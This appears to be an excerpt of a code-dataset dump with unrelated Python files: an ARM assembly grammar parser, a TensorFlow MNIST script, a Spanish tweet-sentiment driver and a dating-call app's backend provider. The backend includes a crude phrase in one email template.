generate_optional_alternative_explanation(instr_name, enc_name, explanations, types, el.children[1].children, el.children[3].children)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n elif el.element.name == 'optional':\n name, args, links = generate_optional_explanation(instr_name, enc_name, explanations, types, el.children)\n return (['{}({})'.format(name, ', '.join(args))], args, links)\n else:\n assert False, 'unknown element name in grammar for asm: ' + el.element.name\n\ndef linearize_parse(instr_name, enc_name, explanations, types, parse):\n start = parse.tree.children[0] if parse.tree.children else parse.tree # pyleri bug workaround?\n elements = [process_element(instr_name, enc_name, explanations, types, el.children[0])[0] for el in start.children]\n return itertools.chain.from_iterable(elements) # flatten\n\n\nasm_rewrites = [\n (r'^([A-Z]+)(\\s+)<(.+?)>\\|#<(.+?)>$', r'\\1\\2(<\\3>|#<\\4>)'), # unbracketed alternatives (DSB etc)\n\n (r'<Xd\\|SP>, <Xn\\|SP>, <R><m>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<Xn\\|SP>, <R><m>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<Wd\\|WSP>, <Wn\\|WSP>, <Wm>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<Wn\\|WSP>, <Wm>{, <extend> {#<amount>}}$', r'<extendedreg_hack>'),\n (r'<label>', '<label_hack>'),\n (r'(<systemreg>|S<op0>_<op1>_<Cn>_<Cm>_<op2>)', '<systemreg>'),\n (r'<Ws>, <W\\(s\\+1\\)>', '<casp_hack_ws>'),\n (r'<Wt>, <W\\(t\\+1\\)>', '<casp_hack_wt>'),\n (r'<Xs>, <X\\(s\\+1\\)>', '<casp_hack_xs>'),\n (r'<Xt>, <X\\(t\\+1\\)>', '<casp_hack_xt>'),\n\n (r'^LSL <Wd>, <Wn>, #<shift>$', 'LSL <Wd>, <Wn>, #<lsl_shift_hack>'),\n (r'^LSL <Xd>, <Xn>, #<shift>$', 'LSL <Xd>, <Xn>, #<lsl_shift_hack>'),\n\n (r'^CNEG <Wd>, <Wn>, <cond>$', 'CNEG <Wd>, 
<matching_Wn>, <cond>'),\n (r'^CNEG <Xd>, <Xn>, <cond>$', 'CNEG <Xd>, <matching_Xn>, <cond>'),\n (r'^CINC <Wd>, <Wn>, <cond>$', 'CINC <Wd>, <matching_Wn>, <cond>'),\n (r'^CINC <Xd>, <Xn>, <cond>$', 'CINC <Xd>, <matching_Xn>, <cond>'),\n (r'^CINV <Wd>, <Wn>, <cond>$', 'CINV <Wd>, <matching_Wn>, <cond>'),\n (r'^CINV <Xd>, <Xn>, <cond>$', 'CINV <Xd>, <matching_Xn>, <cond>'),\n (r'^ROR <Wd>, <Ws>, #<shift>$', 'ROR <Wd>, <matching_Wn>, #<shift>'),\n (r'^ROR <Xd>, <Xs>, #<shift>$', 'ROR <Xd>, <matching_Xn>, #<shift>'),\n\n (r'^BFXIL <Wd>, <Wn>, #<lsb>, #<width>$', 'BFXIL <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^BFXIL <Xd>, <Xn>, #<lsb>, #<width>$', 'BFXIL <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^UBFX <Wd>, <Wn>, #<lsb>, #<width>$', 'UBFX <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^UBFX <Xd>, <Xn>, #<lsb>, #<width>$', 'UBFX <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^UBFIZ <Wd>, <Wn>, #<lsb>, #<width>$', 'UBFIZ <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^UBFIZ <Xd>, <Xn>, #<lsb>, #<width>$', 'UBFIZ <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^SBFX <Wd>, <Wn>, #<lsb>, #<width>$', 'SBFX <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^SBFX <Xd>, <Xn>, #<lsb>, #<width>$', 'SBFX <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^SBFIZ <Wd>, <Wn>, #<lsb>, #<width>$', 'SBFIZ <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^SBFIZ <Xd>, <Xn>, #<lsb>, #<width>$', 'SBFIZ <Xd>, <Xn>, <lsb_width_hack>'),\n (r'^BFC <Wd>, #<lsb>, #<width>$', 'BFC <Wd>, <lsb_width_hack>'),\n (r'^BFC <Xd>, #<lsb>, #<width>$', 'BFC <Xd>, <lsb_width_hack>'),\n (r'^BFI <Wd>, <Wn>, #<lsb>, #<width>$', 'BFI <Wd>, <Wn>, <lsb_width_hack>'),\n (r'^BFI <Xd>, <Xn>, #<lsb>, #<width>$', 'BFI <Xd>, <Xn>, <lsb_width_hack>'),\n\n]\nasm_rewrites = [(re.compile(regex), rep) for regex, rep in asm_rewrites]\n\n\ndef read_asm_encoding(name, explanations, types, xml):\n elements = []\n enc_name = xml.get('name')\n orig_template = template = ''.join(xml.find('asmtemplate').itertext())\n\n for regex, rep in asm_rewrites:\n template = regex.sub(rep, template)\n\n # hack for packed (imm+shift) immediates in MOV aliases\n if enc_name in ('MOV_MOVZ_32_movewide', 'MOV_MOVZ_64_movewide',\n 'MOV_MOVN_32_movewide', 'MOV_MOVN_64_movewide'):\n template = re.sub(r'^MOV <(Xd|Wd)>, #<imm>$', r'MOV <\\1>, #<movewide_imm_hack>', template)\n\n parse = asm_grammar.parse(template)\n assert parse.is_valid\n return (xml.get('bitdiffs'), ' ^ '.join(linearize_parse(name, enc_name, explanations, types, parse)))\n","sub_path":"bin/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":23169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368484810","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\nfrom tensorflow.keras.datasets import mnist\r\nfrom tensorflow.keras.utils import to_categorical\r\n\r\n#1. DATA\r\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\r\n\r\ny_train = to_categorical(y_train)\r\ny_test = to_categorical(y_test)\r\n\r\nx_train = x_train.reshape(-1, 28*28).astype('float32')/255\r\nx_test = x_test.reshape(-1, 28*28).astype('float32')/255\r\n\r\n\r\nx = tf.placeholder('float', [None, 784])\r\ny = tf.placeholder('float', [None, 10])\r\n\r\nw = tf.Variable(tf.random_normal([784, 10]), name = 'weight')\r\nb = tf.Variable(tf.random_normal([10]), name = 'bias')\r\n\r\n#2. 
MODEL\r\nhypothesis = tf.nn.softmax(tf.matmul(x, w) + b)\r\n\r\n# categorical crossentropy (softmax outputs vs. one-hot labels)\r\ncost = tf.reduce_mean(-tf.reduce_sum(y * tf.log(hypothesis), axis=1))\r\n\r\noptimizer = tf.train.AdamOptimizer(learning_rate=0.1).minimize(cost)\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\nwith tf.Session() as sess:\r\n    sess.run(tf.global_variables_initializer())\r\n\r\n    for step in range(2001):\r\n        _, cost_val = sess.run([optimizer, cost], feed_dict={x: x_train, y: y_train})\r\n\r\n        if step % 200 == 0:\r\n            print(step, \"[loss] : \", cost_val)\r\n\r\n    a = sess.run(hypothesis, feed_dict={x: x_test})\r\n    print(\"acc : \", accuracy_score(sess.run(tf.argmax(y_test, 1)), sess.run(tf.argmax(a, 1))))\r\n","sub_path":"tf114/tf16_mnist2.py","file_name":"tf16_mnist2.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"7571360","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport pickle\nimport nltk\nimport MachineLearning, TaggerTrainer, PreProcess_helper\nfrom Corpus import get_corpus\nimport pandas as pd\n\n# Read the command-line parameters passed to the script\nv = 0  # Verbose\na = None  # Algorithm\nt = 1  # Training\ncC = 500  # Corpus cutoff\ntG = 0  # Enable the tagger\ntT = 0  # Train the tagger\npR = 0  # Enable preprocessing\nnT = 1  # Negation threshold\n\noptions = ['-v', '-a', '-t', '-sW', '-cC', '-tg', '-pr', '-nt', '-h']\nif len(sys.argv) >= 2:\n    if '-v' in sys.argv:\n        # 'verbose' level of the program\n        v = int(sys.argv[sys.argv.index('-v')+1])\n    if '-a' in sys.argv:\n        # Algorithm to use\n        # maxEnt => our own maxEnt\n        # skLearn => classification via the scikit-learn library\n        a = sys.argv[sys.argv.index('-a')+1]\n    if '-t' in sys.argv:\n        # Whether training is needed, 0 or 1, 1 by default\n        t = int(sys.argv[sys.argv.index('-t')+1])\n    if '-sW' in sys.argv:\n        # download stopwords\n        nltk.download(\"stopwords\")\n    if '-cC' in sys.argv:\n        # Number of features in the list\n        cC = int(sys.argv[sys.argv.index('-cC')+1])\n    if '-tg' in sys.argv:\n        # Enable the tagger\n        tG = 1\n    if '-tt' in sys.argv:\n        # Train the tagger\n        tT = 1\n    if '-pr' in sys.argv:\n        # Enable preprocessing\n        pR = int(sys.argv[sys.argv.index('-pr')+1])\n    if '-nt' in sys.argv:\n        # Negation threshold\n        if sys.argv[sys.argv.index('-nt')+1] not in options:\n            nT = int(sys.argv[sys.argv.index('-nt')+1])\n    if '-h' in sys.argv:\n        print(\"List of commands:\")\n        print(\"   -v > verbose (1...n)\")\n        print(\"   -tg > tag the corpus\")\n        print(\"   -pr > run preprocessing [1 | 2 | 3]\"\n              \"\n         1 > process_tweet\"\n              \"\n         2 > replace two or more\"\n              \"\n         3 > both previous methods\")\n        print(\"   -nt > threshold for marking negations [1...n] 'no está bien' with nt 2 -> 'no está !bien'\"\n              \"\nIf not specified, only the word immediately after the negation is marked.\")\n        print(\"   -a > algorithm: [maxEnt | SVC]\")\n        print(\"   -t > training [0|1]\")\n        print(\"   -sW > download stopwords\")\n        print(\"   -h > help\")\n\ntagger = None\nif tG == 1 or tT == 1:\n    # Tagger training\n    try:\n        print(\"#Loading the trained tagger...\") if v >= 1 else None\n        f1 = open('data/tagger/tnt_pos_tagger.pickle', 'rb')\n        tagger = pickle.load(f1)\n        f1.close()\n    except Exception as e:\n        print('error: ', e) if v >= 2 else None\n        # Train the tagger\n        if tT == 1:\n            print(
\"File not found! Proceeding to training...\") if v >= 1 else None\n            tt = TaggerTrainer.Tagger(10000, 0, v)\n            tagger = tt.train_tnt()\n            tt.save_tagger(tagger)\n\n# Get the body of the data; if tagger is None the plain corpus is built, otherwise it is tagged\ntweets_corpus = get_corpus(v, tagger)\n\n# Preprocessing\nif pR >= 1 or tG == 1:\n    # Preprocess the texts\n    p_helper = PreProcess_helper.Preprocesshelper()\n    print(\"#Preprocessing the data...\") if v >= 1 else None\n    for tweet in tweets_corpus.content:\n        print(tweet) if v >= 4 else None\n        if tG == 1:\n            # Apply the tag operations and rebuild the processed corpus\n            p_helper.process_tags(tweet, nT, v)\n\nif a is not None:\n    # Instantiate the class that runs the algorithms\n    machineLearning = MachineLearning.MachineLearning(tweets_corpus, v)\n    machineLearning.binarize()\n\n# Check which algorithm to use\nif a == 'maxEnt':\n    machineLearning.param_searchLR()\n    machineLearning.print_paramLR() if v >= 2 else None\nif a == 'SVC':\n    machineLearning.param_searchSVC()\n    machineLearning.print_paramSVC() if v >= 2 else None","sub_path":"AnalysisCV/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442001518","text":"import json\nimport jenkins\nimport pymongo\nfrom classes.mongo import db\nfrom bson.objectid import ObjectId\nfrom APNSWrapper import *\nfrom datetime import datetime, date\nfrom random import randrange\nfrom classes.json_serializer import JsonSerializer\nfrom classes.send_mail import SendMail\nimport binascii\nfrom dateutil.relativedelta import relativedelta\n\n\nclass BusinessProvider:\n    def __init__(self):\n        pass\n\n    def initiate_call(self, user_info, request_data):\n        user_id = user_info[\"id\"]\n        user_info = db.tow.users.find_one({\"_id\": ObjectId(user_id)})\n        if not user_info:\n            raise Exception(\"caller user_id: [{0}] does not exist\".format(user_id))\n        db.tow.users.update({\"_id\": user_info[\"_id\"]}, {\"$set\": {\"settings.call_status\": \"busy\"}})\n        if request_data[\"to_user_id\"] is False:\n            user_info_to_call = self.__find_user_to_call(user_info)\n            if not user_info_to_call:\n                db.tow.users.update({\"_id\": user_info[\"_id\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n                raise Exception(\"no one to call\")\n        else:\n            user_info_to_call = db.tow.users.find_one({\"_id\": ObjectId(request_data[\"to_user_id\"])})\n            if not user_info_to_call:\n                db.tow.users.update({\"_id\": user_info[\"_id\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n                raise Exception(\"destination user_id: [{0}] does not exist\".format(request_data[\"to_user_id\"]))\n        session_id = self.__calculate_session_id(str(user_info[\"_id\"]), str(user_info_to_call[\"_id\"]))\n        session_info = db.tow.sessions.find_one({\"session_id\": session_id})\n        if session_info:\n            self.__reset_session(session_id, user_info[\"_id\"], user_info_to_call[\"_id\"])\n        else:\n            self.__insert_session(session_id, user_info[\"_id\"], user_info_to_call[\"_id\"])\n        user_age = self.__calculate_user_age(user_info)\n        push_text = \"Incoming call from {0} {1}, {2}\".format(user_info[\"first_name\"], user_info[\"last_name\"], user_age)\n        push_object = \\\n            {\n                \"session_id\": session_id,\n                \"date_created\": datetime.utcnow(),\n                \"session_timeout\": 30\n            }\n        if user_info_to_call.get(\"mobile_id\", False) is not False:\n            self.__send_push_notification(user_info_to_call[\"mobile_id\"], push_text, data=push_object, 
use_sound=True)\n result = \\\n {\n \"session_id\": session_id,\n \"session_timeout\": 45,\n \"user_info\": {\n \"first_name\": user_info_to_call[\"first_name\"],\n \"last_name\": user_info_to_call[\"last_name\"],\n \"picture\": \"http://graph.facebook.com/{0}/picture?type=large\".format(\n user_info_to_call[\"facebook_id\"]),\n \"user_id\": str(user_info_to_call[\"_id\"]),\n \"gender\": user_info_to_call[\"gender\"],\n \"age\": self.__calculate_user_age(user_info_to_call),\n \"location\": user_info_to_call.get(\"hometown\", {}).get(\"name\", \"\"),\n \"distance\": randrange(100),\n \"likes\": user_info_to_call.get(\"likes\", [])\n },\n \"stages_info\": {\n \"first_stage_length\": 30,\n \"second_stage_length\": 30,\n \"third_stage_length\": 30,\n \"stage_timeout\": 20\n }\n }\n return result\n\n def receive_call(self, request_data):\n session_info = db.tow.sessions.find_one({\"session_id\": request_data[\"session_id\"]})\n if not session_info:\n raise Exception(\"session_id: [{0}] not found\".format(request_data[\"session_id\"]))\n from_user_info = db.tow.users.find_one({\"_id\": session_info[\"user_1\"]})\n result = \\\n {\n \"session_id\": request_data[\"session_id\"],\n \"session_timeout\": 45,\n \"user_info\": {\n \"first_name\": from_user_info[\"first_name\"],\n \"last_name\": from_user_info[\"last_name\"],\n \"picture\": \"http://graph.facebook.com/{0}/picture?type=large\".format(\n from_user_info[\"facebook_id\"]),\n \"user_id\": str(from_user_info[\"_id\"]),\n \"gender\": from_user_info[\"gender\"],\n \"age\": self.__calculate_user_age(from_user_info),\n \"location\": from_user_info.get(\"hometown\", {}).get(\"name\", \"\"),\n \"distance\": randrange(100),\n \"likes\": from_user_info.get(\"likes\", [])\n },\n \"stages_info\": {\n \"first_stage_length\": 30,\n \"second_stage_length\": 30,\n \"third_stage_length\": 30,\n \"stage_timeout\": 20\n }\n }\n return result\n\n def sync_call(self, user_info, request_data):\n session_params = request_data\n session_info = db.tow.sessions.find_one({\"session_id\": session_params[\"session_id\"]})\n if not session_info:\n raise Exception(\"session_id: [{0}] does not exist\".format(session_params[\"session_id\"]))\n current_user = \"user_1\" if str(session_info[\"user_1\"]) == user_info[\"id\"] else \"user_2\"\n other_user = \"user_1\" if str(session_info[\"user_2\"]) == user_info[\"id\"] else \"user_2\"\n session_info[\"{0}_is_connected_to_twillio\".format(current_user)] = session_params[\"is_connected_to_twillio\"]\n session_info[\"{0}_is_alive\".format(current_user)] = session_params[\"is_alive\"]\n session_info[\"{0}_is_first_stage_ok\".format(current_user)] = session_params[\"is_first_stage_ok\"]\n session_info[\"{0}_is_second_stage_ok\".format(current_user)] = session_params[\"is_second_stage_ok\"]\n session_info[\"{0}_is_third_stage_ok\".format(current_user)] = session_params[\"is_third_stage_ok\"]\n session_info[\"{0}_is_hanged_up\".format(current_user)] = session_params[\"is_hanged_up\"]\n session_info[\"{0}_is_hold\".format(current_user)] = session_params[\"is_hold\"]\n other_user_is_connected_to_twillio = session_info[\"{0}_is_connected_to_twillio\".format(other_user)]\n other_user_is_alive = session_info[\"{0}_is_alive\".format(other_user)]\n other_user_is_first_stage_ok = session_info[\"{0}_is_first_stage_ok\".format(other_user)]\n other_user_is_second_stage_ok = session_info[\"{0}_is_second_stage_ok\".format(other_user)]\n other_user_is_third_stage_ok = session_info[\"{0}_is_third_stage_ok\".format(other_user)]\n # 
other_user_is_hanged_up = session_info[\"{0}_is_hanged_up\".format(other_user)]\n        # other_user_is_hold = session_info[\"{0}_is_hold\".format(other_user)]\n        session_info[\"is_connected_to_twillio\"] = \\\n            session_params[\"is_connected_to_twillio\"] and other_user_is_connected_to_twillio\n        session_info[\"is_alive\"] = session_params[\"is_alive\"] and other_user_is_alive\n        session_info[\"is_first_stage_ok\"] = session_params[\"is_first_stage_ok\"] and other_user_is_first_stage_ok\n        session_info[\"is_second_stage_ok\"] = session_params[\"is_second_stage_ok\"] and other_user_is_second_stage_ok\n        session_info[\"is_third_stage_ok\"] = session_params[\"is_third_stage_ok\"] and other_user_is_third_stage_ok\n        if session_params[\"is_hanged_up\"]:\n            session_info[\"is_hanged_up\"] = True\n            db.tow.users.update({\"_id\": session_info[\"user_1\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n            db.tow.users.update({\"_id\": session_info[\"user_2\"]}, {\"$set\": {\"settings.call_status\": \"available\"}})\n        if current_user == \"user_1\" and session_info[\"is_alive\"] is False:\n            caller_user_info = db.tow.users.find_one({\"_id\": session_info[\"user_2\"]})\n            calling_user_info = db.tow.users.find_one({\"_id\": session_info[\"user_1\"]})\n            calling_user_age = self.__calculate_user_age(calling_user_info)\n            push_text = \"Missed call from {0}, {1}\".format(calling_user_info[\"first_name\"], calling_user_age)\n            if caller_user_info.get(\"mobile_id\", False) is not False:\n                self.__send_push_notification(caller_user_info[\"mobile_id\"], push_text)\n        if session_params[\"is_hold\"]:\n            session_info[\"is_hold\"] = True\n        session_info[\"date_modified\"] = datetime.utcnow()\n        session_info.pop(\"_id\")\n        db.tow.sessions.update({\"session_id\": session_info[\"session_id\"]}, {\"$set\": session_info})\n        result = \\\n            {\n                \"is_connected_to_twillio\": session_info[\"is_connected_to_twillio\"],\n                \"is_alive\": session_info[\"is_alive\"],\n                \"is_first_stage_ok\": session_info[\"is_first_stage_ok\"],\n                \"is_second_stage_ok\": session_info[\"is_second_stage_ok\"],\n                \"is_third_stage_ok\": session_info[\"is_third_stage_ok\"],\n                \"is_hanged_up\": session_info[\"is_hanged_up\"],\n                \"is_hold\": session_info[\"is_hold\"]\n            }\n        return result\n\n    def set_user_settings(self, user_info, request_data):\n        request_data[\"date_modified\"] = datetime.utcnow()\n        user_settings = self.__add_dictionary_keys_prefix(request_data, \"settings.\")\n        db.tow.users.update({\"_id\": ObjectId(user_info[\"id\"])}, {\"$set\": user_settings})\n        return {\"result\": \"ok\"}\n\n    def set_global_settings(self, request_data):\n        settings = db.tow.settings.find_one({}, {\"_id\": 1})\n        if settings:\n            request_data[\"date_modified\"] = datetime.utcnow()\n            db.tow.settings.update({\"_id\": settings[\"_id\"]}, {\"$set\": request_data})\n        else:\n            request_data[\"date_created\"] = datetime.utcnow()\n            request_data[\"date_modified\"] = datetime.utcnow()\n            db.tow.settings.insert(request_data)\n        return {\"result\": \"ok\"}\n\n    def get_user_settings(self, user_info):\n        user_id = user_info[\"id\"]\n        user_info = db.tow.users.find_one({\"_id\": ObjectId(user_id)}, {\"_id\": 0, \"settings\": 1})\n        if not user_info:\n            raise Exception(\"user_id: [{0}] does not exist\".format(user_id))\n        user_info[\"settings\"].pop(\"date_modified\")\n        return user_info[\"settings\"]\n\n    def get_global_settings(self):\n        settings = db.tow.settings.find_one({}, {\"_id\": 0, \"date_created\": 0, \"date_modified\": 0})\n        if settings:\n            return settings\n        raise Exception(\"global settings undefined\")\n\n    def 
get_user_profile_pictures(self, user_info):\n        user_id = user_info[\"id\"]\n        user_info = db.tow.users.find_one({\"_id\": ObjectId(user_id)}, {\"_id\": 0, \"pictures\": 1})\n        if not user_info:\n            raise Exception(\"user_id: [{0}] does not exist\".format(user_id))\n        return user_info[\"pictures\"]\n\n    def get_all_users(self, user_info, request_data):\n        if request_data[\"filter\"] is False:\n            all_users = db.tow.users.find({\"_id\": {\"$ne\": ObjectId(user_info[\"id\"])}},\n                                          {\"name\": 1, \"settings\": 1}).limit(int(request_data[\"limit\"]))\n        else:\n            user_id = user_info[\"id\"]\n            user_info = db.tow.users.find_one({\"_id\": ObjectId(user_id)})\n            all_users = self.__find_user_to_call(user_info, limit=int(request_data[\"limit\"]))\n        if all_users:\n            all_users = list(all_users)\n        return all_users if all_users else []\n\n    def set_location(self, user_info, request_data):\n        geo_json = \\\n            {\n                \"type\": \"Point\",\n                \"coordinates\": [request_data[\"long\"], request_data[\"lat\"]]\n            }\n        db.tow.users.update({\"_id\": ObjectId(user_info[\"id\"])}, {\"$set\": {\"geo_location\": geo_json}})\n        return {\"result\": \"ok\"}\n\n    def send_facebook_data(self, user_info, request_data):\n        from_user_info = db.tow.users.find_one({\"_id\": ObjectId(user_info[\"id\"])})\n        if not from_user_info:\n            raise Exception(\"from_user_info: [{0}] does not exist\".format(user_info[\"id\"]))\n        to_user_info = db.tow.users.find_one({\"_id\": ObjectId(request_data[\"to_user_id\"])})\n        if not to_user_info:\n            raise Exception(\"to_user_info: [{0}] does not exist\".format(request_data[\"to_user_id\"]))\n        text = \"Hi, we have talked on ToW, my name is: [{0}] and my facebook is: \" \\\n               \"<a href='http://www.facebook.com/{1}'>Facebook</a>, let's fuck!\" \\\n            .format(from_user_info[\"name\"], from_user_info[\"facebook_id\"])\n        send_mail = SendMail()\n        send_mail.send_mail(to_user_info[\"email\"], \"notifications@talkorwalkapp.com\", \"TalkOrWalk\", text)\n        return {\"result\": \"ok\"}\n\n    def set_report_person(self, user_info, request_data):\n        from_user_info = db.tow.users.find_one({\"_id\": ObjectId(user_info[\"id\"])})\n        if not from_user_info:\n            raise Exception(\"from_user_info: [{0}] does not exist\".format(user_info[\"id\"]))\n        to_user_info = db.tow.users.find_one({\"_id\": ObjectId(request_data[\"user_to_report\"])})\n        if not to_user_info:\n            raise Exception(\"user_to_report: [{0}] does not exist\".format(request_data[\"user_to_report\"]))\n        reason = request_data.get(\"reason\", \"\")\n        report = \\\n            {\n                \"from_user_id\": from_user_info[\"_id\"],\n                \"from_user_name\": from_user_info[\"name\"],\n                \"date_created\": datetime.now(),\n                \"reason\": reason\n            }\n        db.tow.users.update({\"_id\": to_user_info[\"_id\"]}, {\"$push\": {\"reports\": report}})\n        return {\"result\": \"ok\"}\n\n    def set_call_rating(self, user_info, request_data):\n        session_info = db.tow.sessions.find_one({\"session_id\": request_data[\"session_id\"]},\n                                                {\"_id\": 0, \"user_1\": 1, \"user_2\": 1})\n        if not session_info:\n            raise Exception(\"session_id: [{0}] not found\".format(request_data[\"session_id\"]))\n        if str(session_info[\"user_1\"]) == user_info[\"id\"]:\n            current_user = \"user_1\"\n        elif str(session_info[\"user_2\"]) == user_info[\"id\"]:\n            current_user = \"user_2\"\n        else:\n            raise Exception(\"user_id: [{0}] does not belong to session\".format(user_info[\"id\"]))\n        session_info[\"{0}_rating\".format(current_user)] = \\\n            {\n                \"rating\": request_data[\"rating\"],\n                \"date_created\": datetime.now()\n            }\n        db.tow.sessions.update({\"session_id\": request_data[\"session_id\"]}, {\"$set\": 
session_info})\n return {\"result\": \"ok\"}\n\n def __add_dictionary_keys_prefix(self, dictionary, prefix):\n result = {}\n for x in dictionary.keys():\n result[prefix + x] = dictionary[x]\n return result\n\n def __send_push_notification(self, mobile_id, text, data=None, use_sound=False):\n wrapper = APNSNotificationWrapper(\"/var/www/tow/cert/prod.pem\", sandbox=False)\n message = APNSNotification()\n message.token(binascii.unhexlify(mobile_id))\n message.alert(text)\n if use_sound:\n message.sound(\"ring.wav\")\n if data:\n message.appendProperty(APNSProperty(\"data\", json.dumps(data, cls=JsonSerializer)))\n wrapper.append(message)\n wrapper.notify()\n\n def __find_user_to_call(self, user_info, limit=1):\n query = \\\n {\n \"$and\": [{\"_id\": {\"$ne\": user_info[\"_id\"]}}, {\"settings.call_status\": \"available\"}]\n }\n global_settings = db.tow.settings.find_one()\n if not global_settings:\n global_settings = {}\n if global_settings.get(\"enable_exclude_friends\", False) is not False:\n if user_info[\"settings\"].get(\"exclude_fb_friends\", False) is not False:\n query[\"$and\"] = query[\"$and\"] + [{\"facebook_id\": {\"$ne\": long(x[\"id\"])}} for x in\n user_info.get(\"friends\", [])]\n if global_settings.get(\"enable_gender\", False) is not False:\n gender = user_info[\"settings\"].get(\"gender\", False)\n if gender is not False:\n if gender != \"both\":\n query[\"$and\"] = query[\"$and\"] + [{\"gender\": gender}]\n if global_settings.get(\"enable_age\", False) is not False:\n max_age = user_info[\"settings\"].get(\"maximum_age\", 999)\n min_age = user_info[\"settings\"].get(\"minimum_age\", 0)\n from_birthday = datetime.utcnow() - relativedelta(years=max_age)\n till_birthday = datetime.utcnow() - relativedelta(years=min_age)\n query[\"$and\"] = query[\"$and\"] + [{\"birthday\": {\"$gte\": from_birthday}},\n {\"birthday\": {\"$lte\": till_birthday}}]\n if global_settings.get(\"enable_distance\", False) is not False:\n max_distance = user_info[\"settings\"].get(\"maximum_distance\", 99999)\n if global_settings.get(\"enable_call_reuse\", True) is False:\n user_sessions_caller = list(db.tow.sessions.find({\"user_1\": user_info[\"_id\"], \"is_hanged_up\": True}))\n user_sessions_caller = [x[\"user_2\"] for x in user_sessions_caller]\n user_sessions_callee = list(db.tow.sessions.find({\"user_2\": user_info[\"_id\"], \"is_hanged_up\": True}))\n user_sessions_callee = [x[\"user_1\"] for x in user_sessions_callee]\n user_sessions = user_sessions_caller + user_sessions_callee\n query[\"$and\"] = query[\"$and\"] + [{\"_id\": {\"$ne\": x}} for x in user_sessions]\n if global_settings.get(\"enable_dual_match\", False) is not False:\n user_age = self.__calculate_user_age(user_info)\n user_gender = user_info[\"gender\"]\n query[\"$and\"] = query[\"$and\"] + [{\"settings.gender\": user_gender},\n {\"settings.maximum_age\": {\"$gte\": user_age}},\n {\"settings.minimum_age\": {\"$lte\": user_age}}]\n result = list(db.tow.users.find(query).sort(\"date_modified\", pymongo.DESCENDING))\n if not result:\n return None\n return result[0:limit]\n\n def __calculate_session_id(self, from_user_id, to_user_id):\n from_hash = jenkins.oneatatime(from_user_id)\n to_hash = jenkins.oneatatime(to_user_id)\n minimal = min(from_hash, to_hash)\n if minimal == from_hash:\n first = from_user_id\n second = to_user_id\n else:\n first = to_user_id\n second = from_user_id\n session_id = first + second\n return session_id\n\n def __insert_session(self, session_id, user_id_1, user_id_2):\n session_info = \\\n {\n 
\"session_id\": session_id,\n \"user_1\": user_id_1,\n \"user_2\": user_id_2,\n \"user_1_is_connected_to_twillio\": False,\n \"user_1_is_alive\": False,\n \"user_1_is_first_stage_ok\": False,\n \"user_1_is_second_stage_ok\": False,\n \"user_1_is_third_stage_ok\": False,\n \"user_1_is_hanged_up\": False,\n \"user_1_is_hold\": False,\n \"user_2_is_connected_to_twillio\": False,\n \"user_2_is_alive\": False,\n \"user_2_is_first_stage_ok\": False,\n \"user_2_is_second_stage_ok\": False,\n \"user_2_is_third_stage_ok\": False,\n \"user_2_is_hanged_up\": False,\n \"user_2_is_hold\": False,\n \"is_connected_to_twillio\": False,\n \"is_alive\": False,\n \"is_first_stage_ok\": False,\n \"is_second_stage_ok\": False,\n \"is_third_stage_ok\": False,\n \"is_hanged_up\": False,\n \"is_hold\": False,\n \"date_created\": datetime.utcnow(),\n \"date_modified\": datetime.utcnow()\n }\n db.tow.sessions.insert(session_info)\n\n def __reset_session(self, session_id, user_id_1, user_id_2):\n session_info = \\\n {\n \"session_id\": session_id,\n \"user_1\": user_id_1,\n \"user_2\": user_id_2,\n \"user_1_is_connected_to_twillio\": False,\n \"user_1_is_alive\": False,\n \"user_1_is_first_stage_ok\": False,\n \"user_1_is_second_stage_ok\": False,\n \"user_1_is_third_stage_ok\": False,\n \"user_1_is_hanged_up\": False,\n \"user_1_is_hold\": False,\n \"user_2_is_connected_to_twillio\": False,\n \"user_2_is_alive\": False,\n \"user_2_is_first_stage_ok\": False,\n \"user_2_is_second_stage_ok\": False,\n \"user_2_is_third_stage_ok\": False,\n \"user_2_is_hanged_up\": False,\n \"user_2_is_hold\": False,\n \"is_connected_to_twillio\": False,\n \"is_alive\": False,\n \"is_first_stage_ok\": False,\n \"is_second_stage_ok\": False,\n \"is_third_stage_ok\": False,\n \"is_hanged_up\": False,\n \"is_hold\": False,\n \"date_modified\": datetime.utcnow()\n }\n db.tow.sessions.update({\"session_id\": session_id}, {\"$set\": session_info})\n\n def __calculate_user_age(self, user_info):\n today = date.today()\n try:\n birthday = date(today.year, user_info[\"birthday\"].month, user_info[\"birthday\"].day)\n except ValueError:\n birthday = date(today.year, user_info[\"birthday\"].month, user_info[\"birthday\"].day - 1)\n if birthday > today:\n user_age = today.year - user_info[\"birthday\"].year - 1\n else:\n user_age = today.year - user_info[\"birthday\"].year\n return user_age\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"providers/business_provider.py","file_name":"business_provider.py","file_ext":"py","file_size_in_byte":21790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"595552685","text":"import re\nfrom refcliq.util import 